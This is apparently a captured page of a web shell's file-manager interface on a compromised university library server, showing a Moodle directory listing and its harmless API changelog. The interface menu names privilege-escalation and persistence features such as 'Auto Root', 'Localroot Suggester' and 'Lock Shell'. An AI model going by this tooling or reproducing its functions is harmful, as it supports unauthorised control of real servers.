Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.145.138.21
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
lms /
availability /
Delete
Unzip
Name
Size
Permission
Date
Action
classes
[ DIR ]
drwxrwxrwx
2022-12-30 22:38
condition
[ DIR ]
drwxrwxrwx
2022-12-30 22:38
tests
[ DIR ]
drwxrwxrwx
2022-12-30 22:38
yui
[ DIR ]
drwxrwxrwx
2025-01-19 14:13
renderer.php
2.37
KB
-rw-rw-rw-
2022-01-31 00:06
upgrade.txt
1.23
KB
-rw-rw-rw-
2022-01-31 00:06
Save
Rename
This files describes API changes in /availability/*. The information here is intended only for developers. === 3.2 === * Condition plugins must replace the CSS selector "#fitem_id_availabilityconditionsjson" with ".availability-field". This selector is often used in your plugin's yui/src/form/js/form.js file. === 2.9 === * Condition plugins can now implement a new include_after_restore function to indicate that they should be removed during the restore process. (This is implemented so that group and grouping conditions are removed if groups are not restored.) === 2.8 === * There is a new API function in the info_module/info_section objects (and related functions in internal API): get_user_list_sql. This returns SQL code that does roughly the same as filter_user_list to return a list of users who should be shown as having access to the module or section. * Any third-party availability plugins which return true to is_applied_to_user_lists (and therefore previously implemented filter_user_list) should now also implement get_user_list_sql. If not implemented, a debugging warning will occur when anybody calls get_user_list_sql if the affected plugin is in use, and that user list will not be filtered by the plugin.